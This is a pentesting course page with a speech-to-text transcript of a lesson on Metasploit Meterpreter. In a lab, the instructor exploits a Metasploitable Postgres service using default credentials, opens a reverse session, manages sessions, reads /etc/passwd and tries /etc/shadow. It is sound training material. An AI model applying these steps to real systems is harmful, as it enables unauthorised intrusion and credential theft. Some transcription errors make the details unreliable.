Part 8.1 - Meterpreter

Video Activity

In this video and the next, Dean reviews the Metasploit Meterpreter shell. This is an extremely useful tool for establishing a session with a remote target and poking around for vulnerabilities to exploit. Meterpreter leverages the stager in order to build a connection with the remote target. From there, you can run Metepreter-specific commands. Yo...

Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or

Already have an account? Sign In »

Time
5 hours 38 minutes
Difficulty
Intermediate
CEU/CPE
6
Video Description

In this video and the next, Dean reviews the Metasploit Meterpreter shell. This is an extremely useful tool for establishing a session with a remote target and poking around for vulnerabilities to exploit. Meterpreter leverages the stager in order to build a connection with the remote target. From there, you can run Metepreter-specific commands. You can put the shell in the background and even launch multiple shells on both the target as well as on multiple targets which you can return to later. The video concludes by mentioning the ability to load multiple modules and extensions. This ability makes Meterpreter an extremely flexible and interactive pentesting environment.

Video Transcription
00:05
>> Let's get into discussing Meterpreter.
00:05
It's a interesting word,
00:05
has a Metasploit type of feel to it.
00:05
The Meterpreter is a payload that once it's delivered,
00:05
you get a very highly functional shell on
00:05
that remote system and
00:05
you can do all kinds of other things.
00:05
A Meterpreter, basically only
00:05
will exist in memory on the target system.
00:05
This gives you a lot of
00:05
stealth options as well since you're not
00:05
necessarily writing to disk if you're
00:05
careful and you're choosing the correct options.
00:05
I've got my Metasploitable instance already booted up.
00:05
I know that there's a particular vulnerability
00:05
which I'm just going to exploit really quickly.
00:05
We can explain a little bit more about it later.
00:05
But for the sake of demonstrating
00:05
>> the Meterpreter shell,
00:05
>> I'm going to go ahead and connect.
00:05
Let's head that command.
00:05
I'm going to see which are good.
00:05
I'm in my Metasploitable workspace.
00:05
Now, I know that Metasploitable
00:05
>> has a Postgres database,
00:05
>> just like Kali does actually.
00:05
Lucky for us,
00:05
>> through some experimentation and scanning,
00:05
>> I've discovered that the default login
00:05
and password for Postgres
00:05
is in place and that means that
00:05
the username and the password are both Postgres.
00:05
A lot of software applications will do this.
00:05
You install the software database, a web server,
00:05
what have you, and you get a default credential set.
00:05
What I'm going to do is do a quick search for
00:05
Postgres exploits because I'm not
00:05
sure if I remember exactly what the exploit is called.
00:05
I've got a nice window here.
00:05
I believe the one that I want is
00:05
this guy right here, the Postgres payload.
00:05
As we can see, this is rated as A
00:05
>> and excellent payload.
00:05
>> That gives me a good idea that the payload will work.
00:05
One thing I want to do beforehand is do
00:05
a set-G for my remote host.
00:05
That way I don't have to type this in every time.
00:05
I know that my Metasploitable instance is 0.129.
00:05
I'm going to go ahead and do that.
00:05
You can do set-G if you wish.
00:05
I think set-G is just a little bit easier to deal with.
00:05
Now I want to use this particular exploit.
00:05
I'll type my use command.
00:05
Copy and paste this.
00:05
Now, I'm in the context of the Postgres payload.
00:05
If I show my options,
00:05
I can see that it's got a default database to search,
00:05
rather for authentication purposes,
00:05
and my username is already pre-populated with Postgres.
00:05
I know that the password is supposed to be Postgres,
00:05
based on my research.
00:05
What I can do is I can set password.
00:05
Another thing I meant to point out
00:05
earlier is that you notice
00:05
for the options for each module,
00:05
they are not case sensitive.
00:05
Your entries, the settings are case sensitive.
00:05
If I put in something
00:05
that's uppercase that's supposed to be lowercase,
00:05
it's obviously not going to work.
00:05
But for my password, I know that it's
00:05
supposed also to be Postgres.
00:05
I'll go ahead and set that.
00:05
If I verify my options,
00:05
I can see that everything looks good to go.
00:05
Notice that the target is showing me a Linux x86,
00:05
which is good because that's appropriate
00:05
for this particular target.
00:05
I can also check to
00:05
see if there's any advanced options and there are.
00:05
We don't need any of these for this particular exploit,
00:05
but it's good to just poke around
00:05
when you're looking at exploit to
00:05
see what its capabilities are.
00:05
Targets, it's either x86 or 64-bit x86.
00:05
I've got two different options there.
00:05
But the one that I've got selected should work.
00:05
I'm going to go ahead and type Exploit.
00:05
You can type Run as well as a command
00:05
to actually execute the exploit.
00:05
I like exploit better because it's more descriptive.
00:05
Let's look at what we have here.
00:05
I started my reverse handler on my local system.
00:05
I'm listening, my Kali instance
00:05
is listening on port 444,
00:05
that's my local port will be,
00:05
it's not shown here in my options.
00:05
It's predefined as part of
00:05
the exploit. Some of them are like that.
00:05
You just have to explore each exploit as you
00:05
use it in order to find the right one.
00:05
We've connected to the target system on Port 5432.
00:05
This is also a default port that Postgres listens
00:05
on and we can see that we've got a banner grab.
00:05
I got some really good information here.
00:05
I know this is Postgres version A31.
00:05
I can see that it's running on Linux and I can
00:05
see a Kannel information here, boom 2423.
00:05
I'm also getting some good information about
00:05
the target in addition to being able to connect.
00:05
I've transmitted my stager
00:05
and if you remember from our previous discussion,
00:05
the stager is a component
00:05
of an exploit that helps you to build a connection,
00:05
then the stage itself gets sent.
00:05
We see that there's 1.49 meg worth of data and
00:05
the stage actually is
00:05
the component of the exploit
00:05
that actually builds the connection.
00:05
Now, I can finally see that
00:05
I've opened my Meterpreter session
00:05
between my local system 131,
00:05
the remote system 129.
00:05
Of course, we know that the Meterpreter work
00:05
because I've got a Meterpreter prompt now.
00:05
Like you would expect,
00:05
I can type the Help command
00:05
to see what options I've
00:05
got available within Meterpreter.
00:05
There's quite a few here.
00:05
Looks for the majority of these throughout our course.
00:05
I would expect that you
00:05
would poke around and try some of these options on
00:05
your own as well because you want to
00:05
understand what Meterpreter can do for you.
00:05
But some really easy things to think about,
00:05
one of the commands that I always like
00:05
to think about early
00:05
in a session is to use the background command.
00:05
That lets you put
00:05
a session in the background
00:05
>> and then return to it later.
00:05
>> I can run Background.
00:05
It tells me Session 1
00:05
>> has now been sent to the background.
00:05
>> This is good because the session is still live,
00:05
but I can get back to
00:05
the context of my exploit
00:05
if I want to run some other commands.
00:05
For instance, I can run the sessions command
00:05
and this shows me my active sessions.
00:05
I may have multiple sessions
00:05
active with different systems any given time,
00:05
or even multiple sessions
00:05
active with the same target system.
00:05
I can see I've got a session ID here,
00:05
session ID of one.
00:05
It tells me the type of shell and
00:05
some other information about
00:05
the system and my connection itself.
00:05
Now, if I want to go back
00:05
into interacting with this session,
00:05
you'll notice I can use the -I option.
00:05
I can kill my sessions,
00:05
I can list them, and so on.
00:05
I can run scripts or some other advanced features.
00:05
But for right now, what I want to
00:05
do is go back to the session I've already created.
00:05
I'll do a sessions-I with
00:05
a one because that's my session ID,
00:05
now I'm back in my Meterpreter shell.
00:05
Once I'm in the Meterpreter shell,
00:05
I can do lots of different things.
00:05
For instance, I can look at my core commands,
00:05
I already showed you background.
00:05
I can also kill scripts
00:05
that are running in the background.
00:05
I can list the scripts running in the background,
00:05
I can close channels.
00:05
I can look at info about a particular module.
00:05
I can load more extensions into Meterpreter.
00:05
This is a beautiful thing about Meterpreter,
00:05
it acts as a toehold on that remote system.
00:05
Once you've got connected with the Meterpreter shell,
00:05
now you've got a very
00:05
flexible and interactive environment to bring
00:05
other information and other tools and
00:05
auxiliary modules and so on or extensions.
00:05
I can do those things in order to enhance
00:05
my ability to interact with this system.
00:05
I can still use and
00:05
load modules and extensions just like you'd expect.
00:05
I can even interact with the file system.
00:05
I can cut a file.
00:05
For instance, let's first see what I'm running under.
00:05
Oh, I'm thinking I'm in a command-line shell
00:05
>> that's why I'm running the wrong commands there.
00:05
>> But one thing I can do
00:05
is try to see if I can look at, for instance,
00:05
maybe I've tried to compromise the system and now I
00:05
want to see if I can look at the password file.
00:05
As you can see,
00:05
I've been able to look at this password file,
00:05
has some information that might be useful,
00:05
but it really doesn't have any hashes.
00:05
I'm trying to run the /etc/shadow or trying to show
00:05
the /etc/shadow file and that's not letting me do that.
00:05
I may not have all of the permission that I would like.
00:05
One thing I can do, however,
00:05
once I've got the Meterpreter shell
00:05
established is I can run
00:05
the shell command and try to get a command shell.
00:05
You'll notice I am not route on this command shell,
00:05
so that's why I could not run /etc/shadow.
00:05
I am logged in as Postgres,
00:05
which we saw from
00:05
the exploit options that we set up originally.
00:05
I'm going to go ahead and exit that command shell.
00:05
I don't need to be there.
00:05
I'm going to click "CTRL+C" to terminate that channel.
00:05
My Meterpreter shell is still valid,
00:05
but that command shell
00:05
>> that I launched is now terminated.
Up Next